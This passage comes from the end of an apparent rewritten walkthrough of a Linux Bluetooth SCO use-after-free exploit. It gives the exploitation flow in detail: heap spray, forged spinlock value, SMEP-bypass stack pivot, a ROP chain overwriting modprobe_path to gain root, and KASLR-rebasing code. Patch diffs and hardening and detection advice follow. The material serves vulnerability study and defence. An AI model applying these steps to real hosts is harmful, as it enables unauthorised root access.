│ → kmalloc-1024 → may reclaim freed sco_pinfo slot │
│ │
│ TIMER FIRES (workqueue, ~2s later) │
│ ├── sco_sock_timeout(conn_A) │
│ ├── bh_lock_sock(sk) → reads spray magic 0xdead4ead ✓ │
│ ├── sk->sk_err = ETIMEDOUT │
│ └── sk->sk_state_change(sk) → jumps to 0xffffffff81011cf1 │
│ │
│ SMEP BYPASS + ROP │
│ ├── xchg eax, esp → RSP = 0x0000000081011cf1 (userspace page) │
│ ├── pop rdi; ret → RDI = 0xffffffff8356a020 (modprobe_path) │
│ ├── pop rsi; ret → RSI = 0x00000000dead0000 ("/tmp/x") │
│ ├── pop rdx; ret → RDX = 7 │
│ ├── memcpy(modprobe_path, "/tmp/x", 7) → RAX = modprobe_path │
│ └── ret sled → RIP = 0x0 → kernel oops (panic_on_oops=0, cont.) │
│ │
│ ROOT TRIGGER │
│ ├── system("/tmp/dummy") → kernel: unrecognized binary format │
│ ├── request_module("binfmt-ffffffff") │
│ ├── call_usermodehelper("/tmp/x", ...) → runs as UID 0 │
│ ├── /tmp/x writes "uid=0 gid=0" to /tmp/pwn │
│ └── access("/tmp/pwn") == 0 → ROOTED │
│ │
│ RESULT: unprivileged user → uid=0 gid=0 in Batch 0 │
└───────────────────────────────────────────────────────────────────────┘
12. Reliability Analysis
12.1 Spray reliability factors
CONFIG_DEBUG_SPINLOCK=y widens the race window by inflating shared structures; 2000 iterations per batch overcomes per-CPU freelist isolation in SLUB; the pool of iterations ensures at least one spray allocation lands on the right CPU. Empirically, root is achieved in Batch 0 in every test run.
12.2 What fails without the config changes
| Config change | Effect if reverted |
|---|---|
CONFIG_KASAN=y | SLAB_KASAN prevents the “SCO” slab from merging with kmalloc-1024. Spray never reaches the freed sk. KASAN also catches the UAF and prints a report but doesn’t prevent the oops path — it just makes root unreachable. |
CONFIG_MEMCG_KMEM=y | Same effect as KASAN: SLAB_ACCOUNT mismatch prevents merge. add_key allocates from kmalloc-cg-1024; the freed sk stays in the “SCO” slab. |
CONFIG_DEBUG_SPINLOCK=n | sco_pinfo shrinks to ~832 bytes. Still hits kmalloc-1024, but the race window narrows significantly; spray reliability approaches zero in testing. |
panic_on_oops=1 | The trailing ret into RIP=0 kills the machine before modprobe_path can be triggered. Need a proper kernel-context cleanup or a crash-free ROP epilogue (e.g. iretq or swapgs; iretq chain). |
12.3 KASLR
All addresses above assume nokaslr. With KASLR, kernel base slides by a random 9-bit multiple of 2 MB per boot. Handling it requires reading the kernel base from /proc/kallsyms (which needs kptr_restrict=0) and rebasing every constant:
/* Read slide from /proc/kallsyms (requires kptr_restrict=0) */
FILE *ks = fopen("/proc/kallsyms", "r");
uint64_t kbase = 0;
/* find _text symbol → kbase = addr - 0xffffffff81000000 */
/* Apply slide to all addresses */
XCHG_EAX_ESP = 0xffffffff81011cf1 + kbase;
MODPROBE_PATH = 0xffffffff8356a020 + kbase;
/* etc. */
Real-world Linux distros restrict /proc/kallsyms, so on hardened targets a secondary info-leak is required first.
13. Patch Analysis
/* BEFORE (vulnerable): timer fires against potentially freed sk */
static void sco_sock_timeout(struct work_struct *work) {
...
bh_lock_sock(sk);
sk->sk_err = ETIMEDOUT;
sk->sk_state_change(sk);
bh_unlock_sock(sk);
/* no sock_put — reference was never taken */
}
/* AFTER (patched): sock_hold in sco_conn_add, sock_put here */
static void sco_sock_timeout(struct work_struct *work) {
...
bh_lock_sock(sk);
sk->sk_err = ETIMEDOUT;
sk->sk_state_change(sk);
bh_unlock_sock(sk);
sock_put(sk); /* ← paired with sock_hold() at timer schedule time */
}
/* BEFORE: cancel_delayed_work is async; timer may already be running */
sco_sock_clear_timer(sk); /* → cancel_delayed_work(async) */
sco_chan_del(sk, err); /* → frees sk while timer might still run */
/* AFTER: cancel_delayed_work_sync waits for running work to complete */
sco_conn_lock(conn);
sk = conn->sk;
if (sk) {
sock_hold(sk); /* take reference */
cancel_delayed_work_sync( /* wait for timer to finish */
&conn->timeout_work);
sco_chan_del(sk, err);
sock_put(sk); /* release reference */
}
sco_conn_unlock(conn);
Key Takeaways
- The bug is a textbook callback-vs-free race: two threads create independent
sco_connobjects with their own delayed-work timers,close()only cancels one, the other becomes an orphan firing against freed memory. - SLUB cache merging is what makes the spray viable: with
KASANandMEMCG_KMEMoff, the “SCO” slab merges intokmalloc-1024, so a 980-byteadd_keypayload can reclaim the freedsco_pinfoslot. - The
DEBUG_SPINLOCKmagic (0xdead4ead) is the most fragile check on the path from the timer tosk_state_change— forge it correctly or the exploit dies before reaching RIP control. - SMEP is bypassed not by executing userspace code but by routing the pivot into userspace data — the ROP chain itself sits in a mmap’d userspace page that the kernel reads. SMAP being off is what allows that read.
- Once
memcpy(modprobe_path, "/tmp/x", 7)has run, root is oneexecve()of an invalid-magic binary away — the kernel itself runs the script asuid=0. - The fix in Linux 6.8.2 closes the race at three points: serialise via
sco_conn_lock, hold a refcount across the timer’s lifetime, and usecancel_delayed_work_sync()instead of async cancellation.
Defensive Recommendations
- Patch. Update to Linux 6.8.2 or later on any host that exposes the Bluetooth subsystem. Most distros have backported the fix — verify with
git log --oneline net/bluetooth/sco.cagainst your kernel tree. - Disable the Bluetooth stack where it is not needed. Server / cloud / container hosts almost never need
CONFIG_BT=y— build it out, or blacklistbluetoothandbtusbin/etc/modprobe.d/. - Block
/dev/vhcifor unprivileged users. Without/dev/vhciaccess, no virtual-HCI exploit path.CONFIG_BT_HCIVHCI=nin the kernel, or strict ACLs on/dev/vhci. - Keep KASAN, MEMCG_KMEM, KASLR, and SMAP enabled on production kernels. Each one breaks a different stage of this chain: KASAN/MEMCG break the cache-merge spray, KASLR forces an info leak, SMAP breaks the userspace ROP-chain read.
- Disable
kptr_restrict=0. Setkernel.kptr_restrict=2via sysctl; without it, KASLR is largely cosmetic because/proc/kallsymsleaks the base. - Restrict the keyring spray primitive. Set
kernel.unprivileged_userns_clone=0and considerkernel.keys.maxbytes/maxkeystuning to limit how much heap an unprivileged process can place into the cache the bug victim allocates from. - Monitor for
modprobe_pathtampering. An auditd rule onexecveof unusualmodprobe_pathtargets (anything outside/sbin/modprobeor the configured override) is a high-signal detection for this technique. - Alert on kernel oops with
panic_on_oops=0. Any production host configured to not panic on a kernel oops should at least emit a high-priority alert on every oops event — this exploit (and many like it) relies on continued execution after an oops.
Conclusion
CVE-2024-27398 is the kind of bug that looks small in the patch (move two locks, add a refcount, swap an async cancel for a sync one) but offers a generous primitive: a delayed function-pointer call into a slot the attacker can reclaim. The Secunnix walkthrough is a clean tour through every step that turns that primitive into root — race the connect, orphan the timer, spray the slot via add_key, forge a valid spinlock, pivot the kernel stack into userspace with xchg eax, esp, ROP through memcpy into modprobe_path, and let the kernel run the attacker’s script for free. The pieces that make it work this cleanly — SLUB cache merging, DEBUG_SPINLOCK widening the race, nokaslr, nosmap, panic_on_oops=0 — are exactly the pieces a hardened production kernel turns off. The technique generalises: any kernel callback whose object can be freed-and-reclaimed before the callback fires deserves the same scrutiny.
Original research, figures, code, and POC animation: “CVE-2024-27398 — Exploiting a Linux Bluetooth SCO Use-After-Free with SMEP Bypass”, Secunnix Cyber Security blog (2026-04-25, author not clearly listed). Upstream PoC: sty886/sco-race-condition. modprobe_path root technique credited by the original author to lkmidas. This English rewrite is provided for technical commentary and defender education and does not reproduce the source verbatim.

